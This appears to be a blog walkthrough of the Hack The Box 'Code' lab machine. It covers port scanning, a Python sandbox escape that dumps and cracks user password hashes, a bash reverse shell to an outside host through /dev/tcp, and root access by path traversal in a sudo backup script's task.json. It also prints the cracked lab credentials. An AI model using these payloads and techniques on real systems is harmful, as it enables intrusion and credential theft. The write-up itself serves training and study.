Post

HTB Code Writeup (Walkthrough)

Posted Updated
Preview Image
By Iven
2 min read
HTB Code Writeup (Walkthrough)

Introduction

This is a detailed walkthrough for the “Code” machine on Hack The Box. The target is a Linux system running a Python Code Editor web application vulnerable to database query exposure and privilege escalation via a misconfigured backup script.

INFO

Machine IP = 10.10.11.62 OS = Linux Level = EASY Points = 20

Enumeration

Port Scanning

1

nmap -sC -sV -oN nmap/code 10.10.11.62

Open Ports:

  • 22/tcp OpenSSH 8.2p1
  • 5000/tcp Gunicorn (Python web app)

Web Enumeration

  • URL: http://10.10.11.62:5000
  • Functionality: A Python code editor that executes user-submitted scripts.
  • Initial Test: Executing a simple Python script to test the functionality.
1
2

print("Hello World")  # Works
import os; print(os.getcwd())  # Fails (restricted keywords)

Initial Foothold

1. Bypassing Python Restrictions

The app blocks dangerous keywords (os, subprocess, socket), but allows database queries.

Exploit:

1

print([(user.id, user.username, user.password) for user in User.query.all()])

Output:

1

[(1, 'development', '759b74ce43947f5f4c91aeddc3e5bad3'), (2, 'martin', '3de6f30c4a09c27fc71932bfc68474be')]

2. Cracking Hashes

  • Hash Type: MD5
  • Tools: hashcat or john 
    1

    hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

    Cracked Hash: martin:3de6f30c4a09c27fc71932bfc68474be:nafeelswordsmaster

USER FLAG

We can do it in two ways:

  1. SSH using the cracked password.
  2. Using the web app to execute a reverse shell.

Method 1: SSH

1

ssh [email protected]

Password: nafeelswordsmaster

User Flag:

1

cat /home/app-production/user.txt

Method 2: Reverse Shell via Web App

1

().__class__.__bases__[0].__subclasses__()[317](['bash -c "bash -i >& /dev/tcp/10.10.16.6/4444 0>&1"'], shell=True)

Listener:

1

nc -lvnp 4444

1
2
3
4
5

app-production@code:~$ ls
app
user.txt
app-production@code:~$ cat user.txt
cat user.txt

Privilege Escalation

The correct approach is to bypass path restrictions in task.json using path traversal (/var/….//root/). Here’s how to do it:

1. Modify task.json to Include /root via Path Traversal

1
2
3
4
5
6
7
8
9
10

cat > /home/martin/backups/task.json <<EOF
{
    "destination": "/home/martin/backups/",
    "multiprocessing": true,
    "verbose_log": true,
    "directories_to_archive": [
        "/var/....//root/"
    ]
}
EOF

Why this works?

  • The backy script allows /var/ (whitelisted).
  • ….// is interpreted as ../ (path traversal), escaping /var/ and reaching /root/.

2. Execute backy.sh as Root

1

sudo /usr/bin/backy.sh /home/martin/backups/task.json

This will create a backup of /root/ in /home/martin/backups/.

3. Extract the Backup Archive

1
2
3

cd /home/martin/backups/
ls -l  # Look for the new .tar.bz2 file (e.g., code_var_...._root_2025_March.tar.bz2)
tar -xvjf code_var_...._root_2025_March.tar.bz2

This extracts the contents of /root/ into the current directory.

4. Root Flag

1

cat root/root.txt

Why Did This Work?

  • Path Traversal Bypass:
    • backy.sh only allows /var/ and /home/, but ….// tricks it into accessing /root/.
  • No Symlink Issues:
    • Unlike earlier attempts, this directly archives /root without relying on symlinks.
  • No Command Injection Needed:
    • Pure path manipulation exploits the backup logic.

Done!

Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

HackTheBox, Writeup, Easy
Writeup HTB-Easy
This post is licensed under CC BY 4.0 by the author.